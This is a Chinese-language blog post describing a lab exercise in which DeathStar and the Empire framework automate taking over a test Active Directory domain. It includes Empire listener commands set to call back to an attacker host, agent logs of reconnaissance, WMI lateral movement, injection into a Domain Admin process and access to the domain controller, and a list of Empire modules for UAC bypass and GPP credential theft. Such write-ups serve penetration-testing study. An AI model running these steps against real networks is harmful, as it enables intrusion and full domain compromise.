美文网首页
横向移动之用DeathStar和Empire全自动域渗透[坑]

横向移动之用DeathStar和Empire全自动域渗透[坑]

作者: jjf012 | 来源:发表于2019-01-22 17:23 被阅读0次

    DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar

    环境介绍

    • web服务——windows 2008 r2——192.168.138.141
    • 客户端——windows 2003 r2——192.168.138.128
    • 域控——windows 2008 r2——192.168.138.140
    • 攻击——kali,安装了empireDeathStar

    新建一个普通域用户test,登陆到
    注意: 需要手动修改empire框架中的监听器DeathStar,重启监听器以便让新配置生效

    (Empire: listeners) > edit DeathStar Host http://192.168.138.136:8080
    (Empire: listeners) > edit DeathStar Port 8080
    (Empire: listeners) > disable DeathStar
    (Empire: listeners) > enable DeathStar
    

    开始

    DeathStar通过restempire连接,当empire有一个agent回连之后,DeathStar就开始工作了。

    然而因为测试环境中出现的超长用户名,导致DeathStar出错,简单处理下异常代码就可以接着跑了(图略)。

    注意:因为普通的域用户权限很低,无法进行凭据读取的操作,第一次失败了。

    于是将域用户test加入到windows2003和windows2008的本机管理员组,再执行一遍。

    在window2003(192.168.138.128)上获取域环境信息,并尝试获取本机已有的凭据。

    [+] New Agent => Name: MTLV2E6X IP: 192.168.138.128 HostName: WIN2003 UserName: PENTEST\test HighIntegrity: 1
    [*] Agent: MTLV2E6X => Starting recon
    [+] Agent: MTLV2E6X => Got domain SID: S-1-5-21-3356271140-971267009-3247355629
    [+] Agent: MTLV2E6X => Found 1 members of the Domain Admins group: ['PENTEST\\Administrator']
    [+] Agent: MTLV2E6X => Found 1 Domain Controllers: ['dc.pentest.com']
    [+] Agent: MTLV2E6X => Found 0 active admin sessions: []
    [+] Agent: MTLV2E6X => Found 4 users logged into localhost: ['WIN2003\\web1545978444188', 'WIN2003\\web1545980367000', 'WIN2003\\web1545978429531', 'PENTEST\\test']
    [*] Agent: MTLV2E6X => Starting lateral movement
    [*] Agent: MTLV2E6X => Starting domain privesc
    [+] Agent: MTLV2E6X => Enumerated 1 processes
    [*] Agent: MTLV2E6X => Spawning new Agent using CredID 6
    [*] Agent: MTLV2E6X => Spawning new Agent using CredID 7
    [+] Agent: MTLV2E6X => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
    [+] Agent: MTLV2E6X => Current security context has admin access to 2 hosts
    

    利用wmi横移到windows2008(192.168.138.141)上面。发现并注入到域管理员运行的进程。

    [DEBUG] Agent: MTLV2E6X => Executed Module => success: True taskID: 11 msg: 'tasked agent MTLV2E6X to run module powershell/lateral_movement/invoke_wmi'
    [+] New Agent => Name: 24REVLAS IP: 192.168.138.141 HostName: WEB UserName: PENTEST\test HighIntegrity: 1
    [+] Agent: 24REVLAS => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
    [+] Agent: 24REVLAS => Found Domain Admin logged in: PENTEST\Administrator
    [*] Agent: 24REVLAS => Starting domain privesc
    [+] Agent: 24REVLAS => Enumerated 1 processes
    [*] Agent: 24REVLAS => Found process 1644 running under PENTEST\administrator
    [*] Agent: 24REVLAS => PSInjecting into process 1644
    

    注入成功之后产生一个新的agent,为域管理员权限,可以进入3台主机

    [+] Agent: 24REVLAS => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
    [+] New Agent => Name: 5F2CHEDZ IP: 192.168.138.141 HostName: WEB UserName: PENTEST\administrator HighIntegrity: 1
    [+] Agent: 5F2CHEDZ => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
    [+] Agent: 5F2CHEDZ => Found Domain Admin logged in: PENTEST\Administrator
    [*] Agent: 5F2CHEDZ => Starting lateral movement
    [*] Agent: 5F2CHEDZ => Starting domain privesc
    [+] Agent: 5F2CHEDZ => Enumerated 1 processes
    [+] Agent: 5F2CHEDZ => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
    [+] Agent: 5F2CHEDZ => Current security context has admin access to 3 hosts
    

    成功登陆域控服务器

    [+] New Agent => Name: WY9A1DC7 IP: 192.168.138.140 HostName: DC UserName: PENTEST\Administrator HighIntegrity: 1
    
    [+] Agent: WY9A1DC7 => Got Domain Admin via security context - agent using domain admin account in high integrity process!
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    

    获取的agent,有先后顺序

    换个方式横移——GPO

    组策略的所有配置信息都存放在GPO(Group Policy Object,组策略对象)中,组策略被视为Active Directory中的一种特殊对象,可以将GPO和活动目录的容器(站点、域和OU)连接起来,以影响容器中的用户和计算机。组策略是通过组策略对象来进行管理的。

    统一设置了每台服务器的本机管理员(uid500)的密码,并将域用户test从本机管理员组踢出。
    empire关闭所有agentcreds remove all清除已保存的凭据。
    因为进程注入需要一个存活的域用户进程,而windows2003没法快速切换用户,所以这次从windows2008开始漫游。

    可惜的是因为empire的问题漫游终止了。

    查看agent的job,这里获取的是域策略设置的本机管理员密码,而域里面的每台主机不一定会执行这个策略,所以需要一个empire模块get_gpo_computer.py来获取执行了策略的主机,查看哪些主机是域管理员登陆过的,再横移过去。

    总结

    可以查看DeathStar里面的代码,依次执行了什么empire的哪些模块,再单独手工操练。

    1. powershell/management/get_domain_sid
    2. powershell/situational_awareness/network/powerview/get_group_member
    3. powershell/situational_awareness/network/powerview/get_domain_controller
    4. powershell/situational_awareness/network/powerview/user_hunter
    5. powershell/situational_awareness/network/powerview/get_loggedon
    6. powershell/privesc/gpp
    7. powershell/privesc/bypassuac_eventvwr
    8. powershell/situational_awareness/network/powerview/find_localadmin_access
      等等

    相关文章

      网友评论

          本文标题:横向移动之用DeathStar和Empire全自动域渗透[坑]

          本文链接:https://www.haomeiwen.com/subject/yolrjqtx.html